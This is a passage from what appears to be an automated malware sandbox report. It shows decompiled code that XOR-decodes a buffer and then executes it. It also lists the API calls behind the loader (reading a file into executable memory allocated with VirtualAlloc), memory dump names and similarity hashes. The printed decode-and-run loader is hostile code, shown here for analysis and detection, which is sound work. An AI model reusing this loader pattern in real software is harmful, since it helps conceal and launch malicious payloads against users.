						 *((char*)(_t53 + _t49)) = 0x86 - 0xa5 - (( *((intOrPtr*)(_t53 + _t49)) - 0x00000006 ^ 0x00000009) - _t49 - _t49 ^ _t49 ^ 0x000000b2);
						_t49 = _t49 + 1;
					} while (_t49 < _v8);
				}
				_t37 =  *_t53(); // executed
				return _t37;
			}














    0x100010ac
    0x100010c6
    0x100010d9
    0x100010dc
    0x100010e9
    0x10001101
    0x10001104
    0x1000111a
    0x10001128
    0x10001143
    0x10001156
    0x1000115a
    0x10001167
    0x1000116a
    0x1000116f
    0x10001171
    0x10001176
    0x1000117e
    0x10001183
    0x10001188
    0x1000118c
    0x10001193
    0x10001198
    0x1000119b
    0x1000119c
    0x10001171
    0x100011a1
    0x100011a9

    APIs
    • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 10001143
    • VirtualAlloc.KERNEL32(00000000,00001A05,00003000,00000040), ref: 10001156
    • ReadFile.KERNEL32(00000000,00000000,00001A05,00000000,00000000), ref: 10001167
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.307354018.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.307330926.0000000010000000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.307374346.0000000010002000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: File$AllocCreateReadVirtual
    • String ID: \t8vkb8377ta67uaw82uc
    • API String ID: 3585551309-93217303
    • Opcode ID: 9da5eaaed229b0b50d64fc0b6fc99207859a0f4069733da660f8d020233ccc00
    • Instruction ID: 91844a513c5d040e2c45465d2b0d2c2fbea26ce0bec0a48b99992c2b9b9d8687
    • Opcode Fuzzy Hash: 9da5eaaed229b0b50d64fc0b6fc99207859a0f4069733da660f8d020233ccc00
    • Instruction Fuzzy Hash: 1021D635A41308BFFB11D7B48C8AFCEB7ACEB1A791F500095F604E7281D574BA458A60
    Uniqueness

    Uniqueness Score: -1.00%

    Non-executed Functions